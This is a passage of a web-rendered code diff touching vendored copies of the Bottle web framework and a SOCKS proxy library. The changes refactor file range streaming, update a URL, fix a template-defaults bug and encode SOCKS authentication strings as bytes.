packname = fullname.rsplit('.', 1)[0]
|
||||
if packname != self.name: return
|
||||
if fullname.rsplit('.', 1)[0] != self.name: return
|
||||
return self
|
||||
|
||||
def load_module(self, fullname):
|
||||
@@ -2825,18 +2815,15 @@ def redirect(url, code=None):
|
||||
raise res
|
||||
|
||||
|
||||
def _file_iter_range(fp, offset, bytes, maxread=1024 * 1024, close=False):
|
||||
""" Yield chunks from a range in a file, optionally closing it at the end.
|
||||
No chunk is bigger than maxread. """
|
||||
def _rangeiter(fp, offset, limit, bufsize=1024 * 1024):
|
||||
""" Yield chunks from a range in a file. """
|
||||
fp.seek(offset)
|
||||
while bytes > 0:
|
||||
part = fp.read(min(bytes, maxread))
|
||||
while limit > 0:
|
||||
part = fp.read(min(limit, bufsize))
|
||||
if not part:
|
||||
break
|
||||
bytes -= len(part)
|
||||
limit -= len(part)
|
||||
yield part
|
||||
if close:
|
||||
fp.close()
|
||||
|
||||
|
||||
def static_file(filename, root,
|
||||
@@ -2940,9 +2927,10 @@ def static_file(filename, root,
|
||||
if not ranges:
|
||||
return HTTPError(416, "Requested Range Not Satisfiable")
|
||||
offset, end = ranges[0]
|
||||
rlen = end - offset
|
||||
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen)
|
||||
headers["Content-Length"] = str(end - offset)
|
||||
if body: body = _file_iter_range(body, offset, end - offset, close=True)
|
||||
headers["Content-Length"] = str(rlen)
|
||||
if body: body = _closeiter(_rangeiter(body, offset, rlen), body.close)
|
||||
return HTTPResponse(body, status=206, **headers)
|
||||
return HTTPResponse(body, **headers)
|
||||
|
||||
@@ -3359,7 +3347,7 @@ class MeinheldServer(ServerAdapter):
|
||||
|
||||
|
||||
class FapwsServer(ServerAdapter):
|
||||
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
|
||||
""" Extremely fast webserver using libev. See https://github.com/william-os4y/fapws3 """
|
||||
|
||||
def run(self, handler): # pragma: no cover
|
||||
depr(0, 13, "fapws3 is not maintained and support will be dropped.")
|
||||
@@ -4276,7 +4264,7 @@ def view(tpl_name, **defaults):
|
||||
tplvars.update(result)
|
||||
return template(tpl_name, **tplvars)
|
||||
elif result is None:
|
||||
return template(tpl_name, defaults)
|
||||
return template(tpl_name, **defaults)
|
||||
return result
|
||||
|
||||
return wrapper
|
||||
|
||||
2
thirdparty/socks/socks.py
vendored
2
thirdparty/socks/socks.py
vendored
@@ -195,7 +195,7 @@ class socksocket(socket.socket):
|
||||
elif chosenauth[1:2] == chr(0x02).encode():
|
||||
# Okay, we need to perform a basic username/password
|
||||
# authentication.
|
||||
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
|
||||
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
authstat = self.__recvall(2)
|
||||
if authstat[0:1] != chr(0x01).encode():
|
||||
# Bad response
|
||||
|
||||
Reference in New Issue
Block a user